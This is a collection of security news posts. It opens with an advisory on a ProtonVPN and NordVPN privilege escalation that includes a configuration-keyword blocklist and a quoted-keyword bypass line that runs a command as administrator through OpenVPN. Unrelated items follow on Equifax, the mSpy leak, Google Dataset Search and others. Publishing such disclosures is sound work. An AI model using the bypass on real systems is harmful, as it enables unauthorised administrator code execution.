The vulnerabilities are similar to a bug previously discovered by VerSprite in April 2018: CVE-2018-10169. That same month, both clients released similar patches to fix this flaw. However, we identified a way to bypass that patch. Despite the fix, it is still possible to execute code as an administrator on the system. The details section later on in this post will explain the first patch, why it was not successful, and how the editors finally fixed the problem.




Details


VPN clients' design


To understand the vulnerabilities, we first need to understand the design of the VPN clients mentioned in this article. Both clients have the same design:

  • The user interface. This binary is executed with the permission of the logged-in user. The purpose of this application is to allow the user to select the VPN configuration, such as the protocol, the location of the VPN server, etc. The information is sent to a service when the user clicks on "connect" (it's, in fact, an OpenVPN configuration file).
  • The service. This binary is used to receive orders from the user interface. For example, it receives the VPN configuration file from the user. The goal of the binary is to execute the OpenVPN client binary with the user configuration file (with administrator privileges).


The vulnerabilities in this article abuse the service and allow the standard user to execute arbitrary commands through OpenVPN with administrator privileges.

Initial vulnerability


The first vulnerability discovered by VerSprite is CVE-2018-10169. The author mentions he can create an OpenVPN configuration file with the following content:
plugin path\\OpenVPN_PoC.dll
This configuration file is sent to the service and will use this configuration for OpenVPN. The result is that OpenVPN_POC.dll will be loaded and executed by OpenVPN with administrator privileges.

First patch and limitation


ProtonVPN and NordVPN did the same patch. They implemented a control of the content of the OpenVPN configuration sent by the user:
if ( !text.StartsWithIgnoringCase("<tls-auth>") && 
!text.StartsWithIgnoringCase("<ca>") &&
OpenVpnConfigSecurityValidator.StartsWithName(text, "plugin") ||
OpenVpnConfigSecurityValidator.StartsWithName(text, "script-security") ||
OpenVpnConfigSecurityValidator.StartsWithName(text, "up") ||
OpenVpnConfigSecurityValidator.StartsWithName(text, "down")))
{
reason = string.Format("Invalid configuration file. Reason: {0}", text);
return false;
}
This code checks if the configuration file sent by the user contains a line starting by plugin, script-security, up or down. These are all the methods to execute code or commands through OpenVPN.

Here is the code of the check:
private static bool StartsWithName(string line, string name)
return line.StartsWithIgnoringCase(name + " ") ||
line.StartsWithIgnoringCase(name + "\t") ||
line.EqualsIgnoringCase(name);
}
The developer added additional tests to avoid tabulation or spaces before the keyword.

However, by reading the OpenVPN source code of the configuration file parser here, we can read in parse_line() function that a keyword can be between quotation marks. Therefore, we can add the following text in the configuration file:
"script-security" 2
"up" C:\\WINDOWS\\system32\\notepad.exe
It's valid for OpenVPN, and it passes the checks of the VPN services.


The service executes OpenVPN and it executes notepad.exe.

New patches


The new patches developed by the editors are different. For ProtonVPN, they put the OpenVPN configuration file in the installation directory, and a standard user cannot modify it. Thus, we cannot add the malicious string in it. For NordVPN, the editor decided to use an XML model to generate an OpenVPN configuration file. A standard user cannot edit the template.

More details can be found in the vulnerability reports:


Tested Versions:


  • ProtonVPN VPN Client 1.5.1
  • NordVPN 6.14.28.0


Coverage


The following Snort rules will detect exploitation attempts. Additional rules may be released at a future date, and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Console or Snort.org.

Snort Rules: 47035 - 47036


Sound, Fury, And Nothing One Year After Equifax

One year ago today, Equifax suffered what remains one of the largest and most impactful data breaches in U.S. history. Last September, it was revealed that the personal information of 145 million Americans, almost 700,000 UK citizens, and 19,000 Canadians was stolen by cybercriminals.

This information included names, addresses, birthdays, Social Security numbers, and—in some cases—driver’s licenses. All critical, personally identifiable information (PII) that can resold in the underground and used to commit identity fraud.

This breach had very real impact on the millions affected. On Equifax? Or the industry as a whole? Not so much…

The result is that your personal information remains “entrusted” with various agencies without your knowledge. Agencies that may or may not have your best interests at heart. A year after the Equifax breach, your data has never been at greater risk. Why?

The Equifax breach made international headlines for weeks. It’s a story that has corporate intrigue, political uproar, and controversy…yet nothing really has changed.

What Happened?

Cybercriminals gained access to Equifax’s systems through a known vulnerability in Apache Struts (a web application framework). This easily exploited vulnerability has been left unpatched and unmitigated by Equifax for weeks.

When Equifax discovered the breach, they waited weeks to notify affected individuals and the general public. That notification came in the form of an insecure site on a new domain name. This contributed to the criticism the company faced as they bumbled the response.

The saga took a number of twists and unexpected turns as executives were accused of insider trading, having sold shared valued at $1.8 million dollars after the breach was discovered but before the public announcement. The CIO and CISO stepped down in the wake of the breach. As the company continued to see pushback, political and consumer frustration, the CEO eventually resigned allowing the company to try and turn the page.

After all, Equifax had the tools, people, and process in place to prevent the breach but simply dropped the ball…with catastrophic results.

Customers?

One of the biggest challenges in light of this breach was the relationship that Equifax had with the affected individuals. Equifax maintained a significant amount of personally identifiable information on hundreds of millions of individuals in the US and around the world yet very few of these individuals had a direct relationship with the company.

Equifax and a handful of other consumer credit reporting agencies make their money by selling customer profiles and credit ratings to other business, essentially acting as massive reputation clearing houses.

Given the role played by these agencies, individuals in the US have alarmingly few actions they can take in recourse to an error or breach of their information in care of such an agency. This was a key point raised in the uproar after the Equifax breach.

One year later, let’s check in on the progress made so far…

Lack of Personal Data Protections

Alarmingly, there has been no federal action and only one state has passed legislation regarding personal data protections since the Equifax breach.

In June, California passed the California Consumer Privacy Act of 2018 (AB 375). This landmark legislation takes a much needed step towards personal data protections in the state of California. While not the driving factor for the legislation, the breach contributed to awareness of the need for such protections.

This protects Californian’s in a similar manner to European’s under GDPR. If either piece of legislation was in effect during the Equifax breach, the company would have been looking at major fines.

What Now?

Despite the initial uproar, very little has happened in wake of the Equifax breach. The creation of strict regulation in the EU had been underway for years. The initiative in California had already been underway when this breach happened.

Despite the outrage, very little came of the breach outside of Equifax itself. They brought in new leadership and have tried to shift the security culture, both solid steps. The consent letter signed will help ensure that Equifax continues to build a strong security culture but it doesn’t impact any of the other agencies.

Is this the future? As more and more companies move to monetize data and customer behaviours, a lack of political will and a lack of consumer pressure means that YOUR data remains at risk.

Regulation is always challenging but it’s clear that the market isn’t providing a solution as few of the affected individuals have a relationship with the companies holding the data. Your personal information is just that…yours and very personal.

Individuals need the ability to hold organizations that put that information at risk accountable.

The post Sound, Fury, And Nothing One Year After Equifax appeared first on .

Mobile Spyware Maker mSpy Leaks Millions of Sensitive Records



Security researcher Nitish Shah uncovered a data leak by a Mobile Spyware Maker mSpy that claims to help in excess of a million paying clients keep an eye on the cell phones of their children and partners.

mSpy has leaked millions of sensitive records online, including passwords, call logs, text messages, contacts, notes and area information furtively gathered from phones running the stealthy spyware. He likewise saw that there was no requirement for any verification in order to reach for the records.
As per Shah, the exposed data additionally incorporated the most recent a half year records of mSpy license purchases with the mSpy client logs, alongside the Apple iCloud information of gadgets and devices with the spyware installed on them.


A list of data points that can be slurped from a mobile device that is secretly running mSpy’s software.

Shah later added that when he attempted to alert mSpy of his discoveries; the organization's support personnel disregarded him.

 “I was chatting with their live support, until they blocked me when I asked them to get me in contact with their CTO or head of security,” Shah said.

Later KrebsOnSecurity alerted mSpy about the exposed database on Aug. 30. To which they responded an email from mSpy’s chief security officer, who gave only his first name, “Andrew.”

“We have been working hard to secure our system from any possible leaks, attacks, and private information disclosure. All our customers’ accounts are securely encrypted and the data is being wiped out once in a short period of time. Thanks to you we have prevented this possible breach and from what we could discover the data you are talking about could be some amount of customers’ emails and possibly some other data. However, we could only find that there were only a few points of access and activity with the data.” Andrew wrote.

In any case though, this isn't the first time when mSpy is being considered responsible of a release that brought about the leak of the sensitive records of millions of its clients. As it had likewise occurred in May 2015, that KrebsOnSecurity broke the news that mSpy had been hacked and its client/customer information was posted on the Dark Web.

This Week in Security News: Tracking and Hacking

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days.  This week, Google revealed a secret deal with Mastercard that allows it to track what users buy offline. Also, Senate and House representatives warn that regulation may be coming for social media companies.

Read on:

Little Security Input in IoT Deployment Decisions

Trend Micro’s survey of global IT and security decision-makers found that companies are exposing themselves to greater risks by excluding IT security teams from discussions on IoT deployment plans.

BEC is Big Business for Hackers: What makes these attacks so hard to prevent?

Business Email Compromise, or BEC, is creating opportunities for cybercriminals to make money off of their malicious activity, and the sophistication of these attacks make them difficult to guard against.

Hacking, Cyberattacks Now the Biggest Threat to U.S., Trump’s Homeland Security Chief Warns

Homeland Security Secretary Kirstjen Nielsen stated that cyberweapons pose a greater threat to the U.S. than the risk of physical attacks.

Securing the Convergence of IT with OT

IT\OT processes may converge as they evolve. DevOps breaks down the barriers between development and operations for rapid deployment of new functions without compromising software quality.

Google Secretly Tracks What You Buy Offline Using Mastercard Data

After admitting that it tracks users’ location even after they disable location history, Google revealed that it has signed a secret deal with Mastercard that allows it to track what users buy offline.

The Risk of IoT Security Complacency

Most senior executives recognize that IoT can introduce security risk to the organization, but few will invest resources to remediate that risk.

After Equifax’s Mega-Breach, Nothing Changed

The Equifax data breach that affected more than 145.5 million U.S. adults was supposed to change everything about cybersecurity regulation on Capitol Hill. One year later, it hasn’t changed anything.

Outsmarting Email Hackers Using AI and Machine Learning

Cybercriminals compromise email accounts to enter the IT premises of an organization and carry out attacks ranging from fraud and spying to information and identity theft.

Facebook, Twitter Face Threat of Regulation as Congress Criticizes Response to Russia, Bias Claims

Senate and House representatives applauded efforts by Facebook and Twitter to root out foreign election meddling, but warned that regulation may loom for social media companies.

Do you think companies need to include security teams in discussions about IoT deployment plans? Why or why not? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Tracking and Hacking appeared first on .

Google launches ‘Dataset Search’ to help scientists and journalists

Google Dataset Search: This new search engine helps scientists hunt for public data

Google on Wednesday launched a new search engine targeted at the scientists, data journalists, data geeks or anyone else looking for precise datasets online.

The service called Dataset Search is a targeted search that can help scientists and data journalists find the data required for their work and their stories, or simply to satisfy their intellectual curiosity.

The new search engine works similar to Google Scholar, the company’s popular search engine for academic studies and reports. Dataset Search enables users to find datasets stored across thousands of repositories on the Web, making these datasets universally accessible and useful.

“Dataset Search lets you find datasets wherever they’re hosted, whether it’s a publisher’s site, a digital library, or an author’s personal web page,” Natasha Noy, Research Scientist, Google AI, said in a blog post.

ALSO READ: Google launches new job search feature

To create Dataset Search, Google developed guidelines for dataset providers to describe their data in a way that the company (and other search engines) can better understand the content of their pages.

The approach is based on an open-source standard laid out by the collaborative data community Schema.

“These guidelines include salient information about datasets: who created the dataset, when it was published, how the data was collected, what the terms are for using the data, etc. We then collect and link this information, analyze where different versions of the same dataset might be, and find publications that may be describing or discussing the dataset,” Noy said.

“We encourage dataset providers, large and small, to adopt this common standard so that all datasets are part of this robust ecosystem,” added Noy.

Dataset Search contains contents from organizations like NOAA and NASA, as well as from academic repositories such as Harvard’s Dataverse and Inter-university Consortium for Political and Social Research (ICPSR), along with government data and data provided by news organizations, such as ProPublica.

Dataset Search works in multiple languages with support for additional languages expected to come soon. You can find more information on Google’s official blog post here.

Also, check out the new search engine in action (see video below).

Source: Google

The post Google launches ‘Dataset Search’ to help scientists and journalists appeared first on TechWorm.

IDG Contributor Network: Visibility is key for devops and the hybrid cloud

Cloud has undoubtedly become a key component of successful business in recent years, especially when you consider the race to digitally transform. Across the globe, companies are moving their applications and services to the cloud and are consequently reaping the benefits of lower capex and opex as a result.

However, with this process, cloud migration is only a beginning for any organization’s digital transformation (DX) journey. If harnessed correctly, cloud is a pillar of innovation for DX, and can be a driving force for new business models and use cases that – even a few years ago – weren’t possible. No one knows this better than devops teams; these teams hold the line when it comes to continuous delivery and deployment, and it therefore stands to reason that devops play a crucial role in the digital transformation journey. In practice however, the decision makers in charge of cloud strategies are rarely those in the bowels of the ship.

To read this article in full, please click here

Tesla Encouraging “Good Faith” Security Research in Bug Bounty Program

Electric vehicle manufacturer Tesla is encouraging what it calls “good faith” security research in its bug bounty program. In its vulnerability disclosure program, Tesla says it welcomes “the community to participate in our responsible reporting process” for the company’s product offerings and services. Researchers who participate in the program must report a vulnerability along with […]… Read More

The post Tesla Encouraging “Good Faith” Security Research in Bug Bounty Program appeared first on The State of Security.

6 ways companies fail at security fundamentals

Back to basics
intro security vulnerability

Image by Getty Images

While advanced cyber attacks grab the attention in headlines, often companies are undone by failing to adhere to the basics of cyber security best practices. Tripwire recently released its State of Cyber Hygiene report, which looks at how well organizations are deploying the basic security controls the Center for Internet Security (CIS) refers to as “cyber hygiene.” These include monitoring, benchmarking, patching, configuring and remediating.

To read this article in full, please click here